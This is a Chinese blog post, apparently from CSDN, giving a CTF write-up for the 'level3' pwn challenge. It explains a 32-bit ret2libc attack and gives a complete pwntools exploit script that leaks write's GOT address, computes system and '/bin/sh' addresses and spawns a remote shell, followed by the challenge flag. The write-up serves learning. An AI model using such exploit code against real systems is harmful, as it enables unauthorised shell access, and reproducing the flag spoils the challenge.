pwn level3

最新推荐文章于 2023-04-17 15:49:34 发布
最新推荐文章于 2023-04-17 15:49:34 发布
阅读量522 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45677731/article/details/104864676
版权

解压之后有一个level3和libc_32.so.6,拖进ida(32位)
在这里插入图片描述
主要就是这两个函数,一个write和一个read
这道题的基本思路就是通过第一次溢出将write函数在got表中的地址泄露,然后减去在libc_32.so.6中的偏移,得到基地址,在加上ibc_32.so.6中找到的system和"/bin/sh"偏移得到真实的地址,然后再执行一次main函数进行第二次溢出
对于write,system函数的偏移地址,都有多种方法可以得到
把libc_32.so.6拖进ida,可以找到write函数和system函数的偏移:
在这里插入图片描述
在这里插入图片描述
寻找"/bin/sh"(用winhex也可以找到)
在这里插入图片描述
write.plt和main.pltt可以在ida中找到
在这里插入图片描述
除了这些以外,我还从别人的wp中学到了方法,如下

from pwn import *
from LibcSeacher import *

p=remote('111.198.29.45',47340)
elf=ELF('./level3')
libc=ELF('./libc_32.so.6')

#write_plt=0x08048340
write_plt=elf.plt['write']
write_got=elf.got['write']
#main_addr=0x08048484
main_addr=elf.symbols['main']

#填充字符+write函数地址+main函数地址+write函数的三个参数
payload1='a' * 0x8c + p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
p.sendlineafter("Input:\n",payload1)

#接收write函数在got表中的地址
write_real=u32(p.recv()[:4])

#system_off=0x3a940
system_off=libc.symbols['system']
#bin_off=0x15902b
bin_off=libc.search('/bin/sh').next()
#write_off=0xd43c0
write_off=libc.symbols['write']

#计算基地址
lib_addr=write_real-write_off
#计算system地址
system_addr=lib_addr+system_off
#计算'/bin/sh'地址
bin_addr=lib_addr+bin_off

#填充字符+system地址+这里不用考虑,随意填充4个字节+'/bin/sh'地址
payload2='a'*0x8c+p32(system_addr)+'aaaa'+p32(bin_addr)
p.sendline(payload2)
p.interactive()

flag:cyberpeace{e808c04302e73cdc5159eef2dcd92f48}
在这里插入图片描述

R1nd0
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1386
学习pwn开始,慢慢来不要急
Pwn level题目
zyh18851473527的博客
07-29 1006
level0 pwn一般套路 1.找到栈溢出地址(就是搞事情的地址),基本上都是buf的地址,这个地址需要 用pwntools中的p32或p64进行转换,(若程序是32位的就用p32)才能pwntools中的sendline发送到远程连接 2.构建shellcode,用一句话就行shellcode = asm(shellcraft.sh()) 3.构建payload,payload的基本构...
攻防世界pwn新手区题解-level3
weixin_62621015的博客
04-17 896
攻防世界pwn-level3详细题解。
攻防世界 Pwn level3
MrTreebook的博客
11-22 283
攻防世界pwn level31.checksec看一下保护2.IDA反汇编分析程序3.漏洞利用4.exp附上 1.checksec看一下保护 [*] '/home/ububtu/ctf/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 32位,开启NX保
攻防世界pwn——level3
qq_62076255的博客
11-05 611
攻防世界pwn——level3
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat
最新发布
04-17
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat,文章pwn - 零基础ROP之Android ARM 32位篇(新修订)https://blog.csdn.net/tabactivity/article/details/137780714 全部资料文件。 0基础pwn
level0 -- 攻防世界新手题
01-19
来自攻防世界的pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
pwn学习历程.pdf
09-30
pwn学习修炼之旅,内部包含各个模块各个知识点,有助于爱好者有方向的学习前进,加油,很好的资料哦,很有意义。
攻防世界pwn题:forgot.doc
07-13
我们可以使用pwn工具来编写exploit,使用from pwn import *来import所需的模块,然后使用context(os='linux', arch='i386', log_level='debug')来设置exploit的环境。我们可以使用io = process("./forgot")来创建一...
pwntools-ruby:Ruby上的pwntools!
03-21
pwntools-ruby 玩CTF时总是很难过,在Python中没有什么等同于pwntools。虽然pwntools很棒,但我对Ruby的热爱远超过对Python的热爱。因此,这是创建此类库的尝试。 将尝试与原始pwntools... log_level = :debug z = So
攻防世界 pwn 新手练习区 level0
ChaoYue_miku的博客
07-01 573
题目来源: XMan 题目描述:菜鸡了解了什么是溢出,他相信自己能得到shell 0、根据题目描述,猜测是栈溢出漏洞,使用checksec检查保护机制,同时运行一下文件。 64位文件,开启了NX保护 1、使用IDA 64 Pro打开文件 read()函数明显存在栈溢出漏洞,buf距离栈底0x80个字节,然而read函数可以读取0x200个字节,查看一下栈结构。 这里可以覆盖返回地址,执行需要的函数 发现存在callsystem()函数,将返回值跳转到这个函数,可以直接getshell, 查看一下函数地址
Jarvis OJ - pwn level3
hanqdi_的博客
02-03 223
前言 因为换了电脑,GitHub博客的环境搭起来太麻烦了,又想有所记录,所以又回到这里啦~ level3 前段时间做过pwn题目,现在再来做,发现以前很简单的脚本利用命令都忘记了,真是,啥东西都不能放,一放就忘,这脑子不管用了。 之后每天保持做题量,保持做题手感!在这里记录并且作为监督自己的一种方式。 做题思路 没有system和binsh,又给出了libc文件,容易想到可以用ret2libc方法...
(Jarvis Oj)(Pwn) level3
Nothing
04-24 1651
(Jarvis Oj)(Pwn) level3 首先用checksec查看一下保护。 依然开启了NX保护。ida反汇编,找到溢出点。 可是呢,这次在程序中并没有找到system函数,和”/bin/sh”字符串,那么这次该如何拿到shell呢,还是利用system函数,但是没有程序中system的plt,我们如何获取system的地址呢,这需要利用到在libc.so文件中各个函数的相对...
Writeup of level3(Pwn) in JarvisOJ
cossack9989的博客
02-14 1541
又拾起了被我搁在一边快一个月的Pwn……(这一个月我被Android逆向拐跑了?) 不扯了,看题。 0x00 checksec 拿到文件先查checksec,得到如下信息: root@kali:~/Desktop/Pwn/level3# checksec level3 [*] '/root/Desktop/Pwn/level3/level3' Arch: i386-32-l
[攻防世界 pwn]——level3
Y_peak的博客
02-19 180
题目地址: https://adworld.xctf.org.cn/ 题目: 以前写过这个write up请点击 偷个懒, 师傅们不要介意
XCTF PWN level3
qq_41743240的博客
04-14 383
检查一下保护机制 开了NX,不能执行shellcode,首先选择ROP方式获取shell 通过IDA反编译调试, 发现在vulnerable_function函数这里存在溢出漏洞 查询一下有没有可利用函数 无system和/bin/sh 本题可以有两种解题思路 思路一 根据题目给出的libc泄露system和/bin/sh 该如何泄露呢? 这里有一个公式: libc函数 = 程序函数 ...
攻防世界(pwn) level3
半岛铁盒的博客
03-23 397
先下载附件;,这个附件压缩包里面有好几层,挨着打开就好了 题目没有提供 System函数 和 bin/sh 字符串 来供我们调用; 可以突破的点只有read函数。通过覆盖返回地址,执行两次main函数。第一次泄漏write函数的地址,第二次执行system函数。 from pwn import* from LibcSearcher import* p=remote('111.200.241.244','31433') elf=ELF("1") main_addr=0x8048484 write_plt
Jarvis OJ [XMAN]level3(x64)
九层台
07-09 1061
liu@liu-F117-F:~/桌面/oj/level3_x64$ checksec level3_x64 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level3_x64/level3_x64' Arch: amd64-64-little RELRO: No RELRO Stack: No canary fo...
Jarvis OJ [XMAN]level3 [XMAN]level3
九层台
07-07 1438
查询保护 liu@liu-F117-F:~/桌面/oj/level3$ checksec level3 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level3/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found ...
ubuntu20.04+PWN
08-19
PWN领域中,ubuntu20.04是一个常见的选择。选择ubuntu20.04的原因是因为现在很多比赛的题目大部分都是libc2.27以上的,因此在自己的环境中选择升级也是可以的。你可以按照以下步骤来安装pwndbg: 1. 首先,在终端中导航到pwndbg目录。可以使用以下命令: [1] ``` cd ~/tools/pwndbg ``` 2. 接下来,运行setup.sh脚本进行安装。使用以下命令: [1] ``` ./setup.sh ``` 这样,你就可以成功安装pwndbg工具并开始使用它进行PWN题目的分析和漏洞利用了。 [1] 另外,根据引用中提到的攻防世界的pwn题目,它是一道简单的新手样本题目。然而,由于不同Linux的libc版本,可能会在ubuntu18.04和ubuntu20.04中导致一些小问题。如果你遇到漏洞利用的问题,可以参考提供的链接来解决。 [3<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [ubuntu20.04 PWN(含x86、ARM、MIPS)环境搭建](https://blog.csdn.net/qq_41202237/article/details/118188924)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [level0 -- 攻防世界新手题](https://download.csdn.net/download/A951860555/14819952)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值